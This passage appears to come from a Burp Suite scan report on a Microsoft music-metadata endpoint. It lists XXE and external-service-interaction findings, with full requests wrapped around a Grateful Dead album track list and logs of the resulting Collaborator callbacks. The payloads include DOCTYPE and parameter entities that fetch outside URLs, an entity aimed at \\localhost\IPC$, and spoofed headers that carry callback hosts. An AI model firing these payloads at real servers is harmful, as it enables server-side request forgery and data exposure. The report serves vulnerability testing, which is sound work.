<drmProtected>0</drmProtected>[0x0d][0x0a] <trackRequestID>8</trackRequestID>[0x0d][0x0a] </track>[0x0d][0x0a] </MDQ-CD>[0x0d][0x0a]</METADATA>[0x0d][0x0a] was injected into the XML sent to the server. This payload defines an XML parameter entity within a doctype that references a URL on an external domain.

The application performed a DNS lookup of the specified domain, indicating that the XML parser processed the injected parameter entity within the doctype definition.

Remediation detail

Request

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=CBE2B824-3137-46F9-BB77-34691DDF35AC HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@ksgtitxhft9mh2ymxcuykq39f0lwdx1m.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 17015
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://0gh969lx39x25im2lsie86rp3g9c15pu.burpcollaborator.net/ref
X-Real-IP: spoofed.zwz8m81wj8d1lh211rydo57ojfpbh55u.burpcollaborator.net
Forwarded: for=spoofed.rrm0h0woe08tg9xtwjt5jx2ge7k3cy0n.burpcollaborator.net;by=spoofed.rrm0h0woe08tg9xtwjt5jx2ge7k3cy0n.burpcollaborator.net;host=spoofed.rrm0h0woe08tg9xtwjt5jx2ge7k3cy0n.burpcollaborator.net
X-Forwarded-For: spoofed.iqcrgrvfdr7kf0wkvaswio17dyjubqzf.burpcollaborator.net
Contact: root@hrcqhqweeq8jgzxjw9tvjn26exktcq0f.burpcollaborator.net
From: root@s0t1q15pn1hupa6u5k26sybhn8t4l29r.burpcollaborator.net
True-Client-IP: spoofed.t1v2r26qo2ivqb7v6l37tzcio9u5m4at.burpcollaborator.net
X-Wap-Profile: http://c0dlql59nlhepu6e542qsib1nstolo9d.burpcollaborator.net/wap.xml
Client-ip: spoofed.x646w6but6nzvfczbp8by3hmtdz9rbf0.burpcollaborator.net

<!DOCTYPE metadata [<!ENTITY % f6vl5 SYSTEM "http://0ef2etb5zrz2s7af9rgkxi8fi6oxeld940rqff.burpcollaborator.net">%f6vl5; ]><METADATA>
<MDQ-CD>
<mdqRequestID>CBE2B824-3137-46F9-BB77-34691DDF35AC</mdqRequestID>
<album>
<title>
<text>Dick's Picks, Vol. 17: Boston Garden, Boston, MA 9/25/91</text>
<word>Dicks</word>
<word>Picks</word>
<word>Vol</word>
<word>17</word>
<word>Boston</word>
<word>Garden</word>
<word>Boston</word>
<word>MA</word>
<word>9</word>
<word>25</word>
<word>91</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
</album>
<track>
<title>
<text>Help On the Way</text>
<word>Help</word>
<word>On</word>
<word>the</word>
<word>Way</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>1</trackNumber>
<filename>1-01 Help On the Way.m4a</filename>
<trackDuration>255326</trackDuration>
<bitrate>302064</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
<track>
<title>
<text>Victim or the Crime</text>
<word>Victim</word>
<word>or</word>
<word>the</word>
<word>Crime</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>1</trackNumber>
<filename>2-01 Victim or the Crime.m4a</filename>
<trackDuration>505010</trackDuration>
<bitrate>277032</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>9</trackRequestID>
</track>
<track>
<title>
<text>That Would Be Something</text>
<word>That</word>
<word>Would</word>
<word>Be</word>
<word>Something</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>1</trackNumber>
<filename>3-01 That Would Be Something.m4a</filename>
<trackDuration>231526</trackDuration>
<bitrate>267560</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>16</trackRequestID>
</track>
<track>
<title>
<text>Slipknot!</text>
<word>Slipknot</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>2</trackNumber>
<filename>1-02 Slipknot!.m4a</filename>
<trackDuration>330466</trackDuration>
<bitrate>277496</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>1</trackRequestID>
</track>
<track>
<title>
<text>Crazy Fingers</text>
<word>Crazy</word>
<word>Fingers</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>2</trackNumber>
<filename>2-02 Crazy Fingers.m4a</filename>
<trackDuration>578919</trackDuration>
<bitrate>270592</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>10</trackRequestID>
</track>
<track>
<title>
<text>Playing In the Band</text>
<word>Playing</word>
<word>In</word>
<word>the</word>
<word>Band</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>2</trackNumber>
<filename>3-02 Playing In the Band.m4a</filename>
<trackDuration>323616</trackDuration>
<bitrate>283784</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>17</trackRequestID>
</track>
<track>
<title>
<text>Franklin's Tower</text>
<word>Franklins</word>
<word>Tower</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>3</trackNumber>
<filename>1-03 Franklin's Tower.m4a</filename>
<trackDuration>641660</trackDuration>
<bitrate>277072</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>2</trackRequestID>
</track>
<track>
<title>
<text>Playing In the Band</text>
<word>Playing</word>
<word>In</word>
<word>the</word>
<word>Band</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>3</trackNumber>
<filename>2-03 Playing In the Band.m4a</filename>
<trackDuration>562642</trackDuration>
<bitrate>281312</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>11</trackRequestID>
</track>
<track>
<title>
<text>China Doll</text>
<word>China</word>
<word>Doll</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>3</trackNumber>
<filename>3-03 China Doll.m4a</filename>
<trackDuration>347022</trackDuration>
<bitrate>264424</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>18</trackRequestID>
</track>
<track>
<title>
<text>Walkin' Blues</text>
<word>Walkin</word>
<word>Blues</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>4</trackNumber>
<filename>1-04 Walkin' Blues.m4a</filename>
<trackDuration>390884</trackDuration>
<bitrate>274608</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>3</trackRequestID>
</track>
<track>
<title>
<text>Terrapin Station</text>
<word>Terrapin</word>
<word>Station</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>4</trackNumber>
<filename>2-04 Terrapin Station.m4a</filename>
<trackDuration>767930</trackDuration>
<bitrate>271168</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>12</trackRequestID>
</track>
<track>
<title>
<text>Throwing Stones</text>
<word>Throwing</word>
<word>Stones</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>4</trackNumber>
<filename>3-04 Throwing Stones.m4a</filename>
<trackDuration>539469</trackDuration>
<bitrate>276512</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>19</trackRequestID>
</track>
<track>
<title>
<text>It Must Have Been the Roses</text>
<word>It</word>
<word>Must</word>
<word>Have</word>
<word>Been</word>
<word>the</word>
<word>Roses</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>5</trackNumber>
<filename>1-05 It Must Have Been the Roses.m4a</filename>
<trackDuration>345977</trackDuration>
<bitrate>263432</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>4</trackRequestID>
</track>
<track>
<title>
<text>Boston Clam Jam</text>
<word>Boston</word>
<word>Clam</word>
<word>Jam</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>5</trackNumber>
<filename>2-05 Boston Clam Jam.m4a</filename>
<trackDuration>337409</trackDuration>
<bitrate>274216</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>13</trackRequestID>
</track>
<track>
<title>
<text>Not Fade Away</text>
<word>Not</word>
<word>Fade</word>
<word>Away</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>5</trackNumber>
<filename>3-05 Not Fade Away.m4a</filename>
<trackDuration>541791</trackDuration>
<bitrate>262816</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>20</trackRequestID>
</track>
<track>
<title>
<text>Dire Wolf</text>
<word>Dire</word>
<word>Wolf</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>6</trackNumber>
<filename>1-06 Dire Wolf.m4a</filename>
<trackDuration>239653</trackDuration>
<bitrate>263096</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>5</trackRequestID>
</track>
<track>
<title>
<text>Drums</text>
<word>Drums</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>6</trackNumber>
<filename>2-06 Drums.m4a</filename>
<trackDuration>664764</trackDuration>
<bitrate>265960</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>14</trackRequestID>
</track>
<track>
<title>
<text>The Mighty Quinn</text>
<word>The</word>
<word>Mighty</word>
<word>Quinn</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>6</trackNumber>
<filename>3-06 The Mighty Quinn.m4a</filename>
<trackDuration>281054</trackDuration>
<bitrate>263256</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>21</trackRequestID>
</track>
<track>
<title>
<text>Queen Jane Approximately</text>
<word>Queen</word>
<word>Jane</word>
<word>Approximately</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>7</trackNumber>
<filename>1-07 Queen Jane Approximately.m4a</filename>
<trackDuration>436883</trackDuration>
<bitrate>269672</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>6</trackRequestID>
</track>
<track>
<title>
<text>Space</text>
<word>Space</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>7</trackNumber>
<filename>2-07 Space.m4a</filename>
<trackDuration>495537</trackDuration>
<bitrate>261064</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>15</trackRequestID>
</track>
<track>
<title>
<text>Samson and Delilah</text>
<word>Samson</word>
<word>and</word>
<word>Delilah</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>7</trackNumber>
<filename>3-07 Samson and Delilah.m4a</filename>
<trackDuration>467348</trackDuration>
<bitrate>279320</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>22</trackRequestID>
</track>
<track>
<title>
<text>Tennessee Jed</text>
<word>Tennessee</word>
<word>Jed</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>8</trackNumber>
<filename>1-08 Tennessee Jed.m4a</filename>
<trackDuration>470366</trackDuration>
<bitrate>268080</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>7</trackRequestID>
</track>
<track>
<title>
<text>Eyes of the World</text>
<word>Eyes</word>
<word>of</word>
<word>the</word>
<word>World</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>8</trackNumber>
<filename>3-08 Eyes of the World.m4a</filename>
<trackDuration>1410078</trackDuration>
<bitrate>276416</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>23</trackRequestID>
</track>
<track>
<title>
<text>The Music Never Stopped</text>
<word>The</word>
<word>Music</word>
<word>Never</word>
<word>Stopped</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>9</trackNumber>
<filename>1-09 The Music Never Stopped.m4a</filename>
<trackDuration>498718</trackDuration>
<bitrate>273520</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>8</trackRequestID>
</track>
</MDQ-CD>
</METADATA>

Collaborator DNS interaction

The Collaborator server received a DNS lookup of type A for the domain name 0ef2etb5zrz2s7af9rgkxi8fi6oxeld940rqff.burpcollaborator.net.

The lookup was received from IP address 65.55.5.146 at 2017-Sep-03 23:38:02 UTC.

3. External service interaction (HTTP)
Previous Next

There are 4 instances of this issue:

/cdinfo/getmdrcd.aspx [manual insertion point 1]
/cdinfo/getmdrcd.aspx [manual insertion point 1]
/cdinfo/getmdrcd.aspx [request body]
/cdinfo/getmdrcd.aspx [request body]

Issue background

The ability to send requests to other systems can allow the vulnerable server to be used as an attack proxy. By submitting suitable payloads, an attacker can cause the application server to attack other systems that it can interact with. This may include public third-party systems, internal systems within the same organization, or services available on the local loopback adapter of the application server itself. Depending on the network architecture, this may expose highly vulnerable internal services that are not otherwise accessible to external attackers.

Remediation background

References

Burp Collaborator

Vulnerability classifications

3.1. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [manual insertion point 1]
Previous Next

Summary

	Severity:	High
	Confidence:	Certain
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/cdinfo/getmdrcd.aspx

Issue detail

It is possible to induce the application to perform server-side HTTP requests to arbitrary domains. The tag <!DOCTYPE foo PUBLIC "-//B/A/EN" "http://lxmnxeuqicinbst0scz5g3r01r7nvdjb72xpndc.burpcollaborator.net"> was injected into the XML sent to the server in the manual insertion point 1. This payload defines an XML doctype that references a URL on an external domain.

The application performed an HTTP request to the specified domain, indicating that the XML parser processed the injected doctype definition.

Remediation detail

Request

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=CBE2B824-3137-46F9-BB77-34691DDF35AC HTTP/1.1
Accept: */*
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 152
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo PUBLIC "-//B/A/EN" "http://lxmnxeuqicinbst0scz5g3r01r7nvdjb72xpndc.burpcollaborator.net">
<!ENTITY xxe SYSTEM "\\localhost\IPC$" >]>
<foo>&xxe;</foo>

Response

Collaborator HTTP interaction

The Collaborator server received an HTTP request.

The request was received from IP address 157.56.59.219 at 2018-Dec-19 20:42:31 UTC.

Request to Collaborator

GET / HTTP/1.1
Host: lxmnxeuqicinbst0scz5g3r01r7nvdjb72xpndc.burpcollaborator.net
Connection: Keep-Alive

Response from Collaborator

HTTP/1.1 200 OK
Server: Burp Collaborator https://burpcollaborator.net/
X-Collaborator-Version: 4
Content-Type: text/html
Content-Length: 62

<html><body>usjp4ges3lxa0r4zl9q3p2zjogigqgjifigz</body></html>

3.2. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [manual insertion point 1]
Previous Next

Summary

	Severity:	High
	Confidence:	Certain
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/cdinfo/getmdrcd.aspx

Issue detail

It is possible to induce the application to perform server-side HTTP requests to arbitrary domains. The tag <?xml version="1.0" encoding="ISO-8859-1" standalone='no'?>[0x0d][0x0a] <!DOCTYPE foo [<!ENTITY % kevmw SYSTEM "http://9nxbn2ke808b1gjoi0pt6rhorfxbl190xrned22.burpcollaborator.net">%kevmw; ]>[0x0d][0x0a] <!ENTITY xxe SYSTEM "\\localhost\IPC$" >]>[0x0d][0x0a]<foo>&xxe;</foo>[0x0d][0x0a] was injected into the XML sent to the server in the manual insertion point 1. This payload defines an XML parameter entity within a doctype that references a URL on an external domain.

The application performed an HTTP request to the specified domain, indicating that the XML parser processed the injected parameter entity within the doctype definition.

Remediation detail

Request

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=CBE2B824-3137-46F9-BB77-34691DDF35AC HTTP/1.1
Accept: */*
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 152
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Connection: close

<?xml version="1.0" encoding="ISO-8859-1" standalone='no'?>
<!DOCTYPE foo [<!ENTITY % kevmw SYSTEM "http://9nxbn2ke808b1gjoi0pt6rhorfxbl190xrned22.burpcollaborator.net">%kevmw; ]>
<!ENTITY xxe SYSTEM "\\localhost\IPC$" >]>
<foo>&xxe;</foo>

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 19 Dec 2018 20:42:31 GMT
Connection: close

<METADATA><mdqRequestID>CBE2B824-3137-46F9-BB77-34691DDF35AC</mdqRequestID><ResponseCode>Error: Parse Error</ResponseCode><ResponseCode>Expected DTD markup was not found. Line 1, position 1.</ResponseCode><Backoff><Time>15</Time></Backoff><L2Threshold>0.14</L2Threshold></METADATA>

Collaborator HTTP interaction

The Collaborator server received an HTTP request.

The request was received from IP address 157.56.59.219 at 2018-Dec-19 20:42:32 UTC.

Request to Collaborator

GET / HTTP/1.1
Host: 9nxbn2ke808b1gjoi0pt6rhorfxbl190xrned22.burpcollaborator.net
Connection: Keep-Alive

Response from Collaborator

3.3. http://info.music.metaservices.microsoft.com/cdinfo/getmdrcd.aspx [request body]
Previous Next

Summary

	Severity:	High
	Confidence:	Certain
	Host:	http://info.music.metaservices.microsoft.com
	Path:	/cdinfo/getmdrcd.aspx

Issue detail

It is possible to induce the application to perform server-side HTTP requests to arbitrary domains. The tag <!DOCTYPE metadata PUBLIC "-//B/A/EN" "http://svruvlsxgjgu9zr7qjxceap7zy5pvdt1ks7iv7.burpcollaborator.net"> was injected into the XML sent to the server. This payload defines an XML doctype that references a URL on an external domain.

The application performed an HTTP request to the specified domain, indicating that the XML parser processed the injected doctype definition.

Remediation detail

Request

POST /cdinfo/getmdrcd.aspx?locale=409&geoid=f4&version=12.0.15063.0&userlocale=409&requestID=CBE2B824-3137-46F9-BB77-34691DDF35AC HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@ksgtitxhft9mh2ymxcuykq39f0lwdx1m.burpcollaborator.net
Content-Type: text/xml
Accept-Encoding: gzip, deflate
Content-Length: 17015
Host: info.music.metaservices.microsoft.com
Pragma: no-cache
Cookie: SRCHD=AF=NOFORM; SRCHUSR=DOB=20151220; MC1=GUID=94a17c0c597ec54098247c7196d50443&HASH=0c7c&LV=201512&V=4&LU=1450813225752; A=I&I=AxUFAAAAAACCBwAAYLXT4lJLlqvfrKeD0cr3cw!!&V=4
Connection: close
Cache-Control: no-transform
Referer: http://0gh969lx39x25im2lsie86rp3g9c15pu.burpcollaborator.net/ref
X-Real-IP: spoofed.zwz8m81wj8d1lh211rydo57ojfpbh55u.burpcollaborator.net
Forwarded: for=spoofed.rrm0h0woe08tg9xtwjt5jx2ge7k3cy0n.burpcollaborator.net;by=spoofed.rrm0h0woe08tg9xtwjt5jx2ge7k3cy0n.burpcollaborator.net;host=spoofed.rrm0h0woe08tg9xtwjt5jx2ge7k3cy0n.burpcollaborator.net
X-Forwarded-For: spoofed.iqcrgrvfdr7kf0wkvaswio17dyjubqzf.burpcollaborator.net
Contact: root@hrcqhqweeq8jgzxjw9tvjn26exktcq0f.burpcollaborator.net
From: root@s0t1q15pn1hupa6u5k26sybhn8t4l29r.burpcollaborator.net
True-Client-IP: spoofed.t1v2r26qo2ivqb7v6l37tzcio9u5m4at.burpcollaborator.net
X-Wap-Profile: http://c0dlql59nlhepu6e542qsib1nstolo9d.burpcollaborator.net/wap.xml
Client-ip: spoofed.x646w6but6nzvfczbp8by3hmtdz9rbf0.burpcollaborator.net

<!DOCTYPE metadata PUBLIC "-//B/A/EN" "http://svruvlsxgjgu9zr7qjxceap7zy5pvdt1ks7iv7.burpcollaborator.net"><METADATA>
<MDQ-CD>
<mdqRequestID>CBE2B824-3137-46F9-BB77-34691DDF35AC</mdqRequestID>
<album>
<title>
<text>Dick's Picks, Vol. 17: Boston Garden, Boston, MA 9/25/91</text>
<word>Dicks</word>
<word>Picks</word>
<word>Vol</word>
<word>17</word>
<word>Boston</word>
<word>Garden</word>
<word>Boston</word>
<word>MA</word>
<word>9</word>
<word>25</word>
<word>91</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
</album>
<track>
<title>
<text>Help On the Way</text>
<word>Help</word>
<word>On</word>
<word>the</word>
<word>Way</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>1</trackNumber>
<filename>1-01 Help On the Way.m4a</filename>
<trackDuration>255326</trackDuration>
<bitrate>302064</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>0</trackRequestID>
</track>
<track>
<title>
<text>Victim or the Crime</text>
<word>Victim</word>
<word>or</word>
<word>the</word>
<word>Crime</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>1</trackNumber>
<filename>2-01 Victim or the Crime.m4a</filename>
<trackDuration>505010</trackDuration>
<bitrate>277032</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>9</trackRequestID>
</track>
<track>
<title>
<text>That Would Be Something</text>
<word>That</word>
<word>Would</word>
<word>Be</word>
<word>Something</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>1</trackNumber>
<filename>3-01 That Would Be Something.m4a</filename>
<trackDuration>231526</trackDuration>
<bitrate>267560</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>16</trackRequestID>
</track>
<track>
<title>
<text>Slipknot!</text>
<word>Slipknot</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>2</trackNumber>
<filename>1-02 Slipknot!.m4a</filename>
<trackDuration>330466</trackDuration>
<bitrate>277496</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>1</trackRequestID>
</track>
<track>
<title>
<text>Crazy Fingers</text>
<word>Crazy</word>
<word>Fingers</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>2</trackNumber>
<filename>2-02 Crazy Fingers.m4a</filename>
<trackDuration>578919</trackDuration>
<bitrate>270592</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>10</trackRequestID>
</track>
<track>
<title>
<text>Playing In the Band</text>
<word>Playing</word>
<word>In</word>
<word>the</word>
<word>Band</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>2</trackNumber>
<filename>3-02 Playing In the Band.m4a</filename>
<trackDuration>323616</trackDuration>
<bitrate>283784</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>17</trackRequestID>
</track>
<track>
<title>
<text>Franklin's Tower</text>
<word>Franklins</word>
<word>Tower</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>3</trackNumber>
<filename>1-03 Franklin's Tower.m4a</filename>
<trackDuration>641660</trackDuration>
<bitrate>277072</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>2</trackRequestID>
</track>
<track>
<title>
<text>Playing In the Band</text>
<word>Playing</word>
<word>In</word>
<word>the</word>
<word>Band</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>3</trackNumber>
<filename>2-03 Playing In the Band.m4a</filename>
<trackDuration>562642</trackDuration>
<bitrate>281312</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>11</trackRequestID>
</track>
<track>
<title>
<text>China Doll</text>
<word>China</word>
<word>Doll</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>3</trackNumber>
<filename>3-03 China Doll.m4a</filename>
<trackDuration>347022</trackDuration>
<bitrate>264424</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>18</trackRequestID>
</track>
<track>
<title>
<text>Walkin' Blues</text>
<word>Walkin</word>
<word>Blues</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>4</trackNumber>
<filename>1-04 Walkin' Blues.m4a</filename>
<trackDuration>390884</trackDuration>
<bitrate>274608</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>3</trackRequestID>
</track>
<track>
<title>
<text>Terrapin Station</text>
<word>Terrapin</word>
<word>Station</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>4</trackNumber>
<filename>2-04 Terrapin Station.m4a</filename>
<trackDuration>767930</trackDuration>
<bitrate>271168</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>12</trackRequestID>
</track>
<track>
<title>
<text>Throwing Stones</text>
<word>Throwing</word>
<word>Stones</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>4</trackNumber>
<filename>3-04 Throwing Stones.m4a</filename>
<trackDuration>539469</trackDuration>
<bitrate>276512</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>19</trackRequestID>
</track>
<track>
<title>
<text>It Must Have Been the Roses</text>
<word>It</word>
<word>Must</word>
<word>Have</word>
<word>Been</word>
<word>the</word>
<word>Roses</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>5</trackNumber>
<filename>1-05 It Must Have Been the Roses.m4a</filename>
<trackDuration>345977</trackDuration>
<bitrate>263432</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>4</trackRequestID>
</track>
<track>
<title>
<text>Boston Clam Jam</text>
<word>Boston</word>
<word>Clam</word>
<word>Jam</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>5</trackNumber>
<filename>2-05 Boston Clam Jam.m4a</filename>
<trackDuration>337409</trackDuration>
<bitrate>274216</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>13</trackRequestID>
</track>
<track>
<title>
<text>Not Fade Away</text>
<word>Not</word>
<word>Fade</word>
<word>Away</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>5</trackNumber>
<filename>3-05 Not Fade Away.m4a</filename>
<trackDuration>541791</trackDuration>
<bitrate>262816</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>20</trackRequestID>
</track>
<track>
<title>
<text>Dire Wolf</text>
<word>Dire</word>
<word>Wolf</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>6</trackNumber>
<filename>1-06 Dire Wolf.m4a</filename>
<trackDuration>239653</trackDuration>
<bitrate>263096</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>5</trackRequestID>
</track>
<track>
<title>
<text>Drums</text>
<word>Drums</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>6</trackNumber>
<filename>2-06 Drums.m4a</filename>
<trackDuration>664764</trackDuration>
<bitrate>265960</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>14</trackRequestID>
</track>
<track>
<title>
<text>The Mighty Quinn</text>
<word>The</word>
<word>Mighty</word>
<word>Quinn</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>6</trackNumber>
<filename>3-06 The Mighty Quinn.m4a</filename>
<trackDuration>281054</trackDuration>
<bitrate>263256</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>21</trackRequestID>
</track>
<track>
<title>
<text>Queen Jane Approximately</text>
<word>Queen</word>
<word>Jane</word>
<word>Approximately</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>7</trackNumber>
<filename>1-07 Queen Jane Approximately.m4a</filename>
<trackDuration>436883</trackDuration>
<bitrate>269672</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>6</trackRequestID>
</track>
<track>
<title>
<text>Space</text>
<word>Space</word>
</title>
<artist>
<text>Grateful Dead</text>
<word>Grateful</word>
<word>Dead</word>
</artist>
<trackNumber>7</trackNumber>
<filename>2-07 Space.m4a</filename>
<trackDuration>495537</trackDuration>
<bitrate>261064</bitrate>
<drmProtected>0</drmProtected>
<trackRequestID>15</trackRequestID>
</track>
<track>
<title>
<text>Samson and Delilah</text>
<word>Samson</word>
<word>and</word>
<word>Delilah</word>
</title>
<artist>
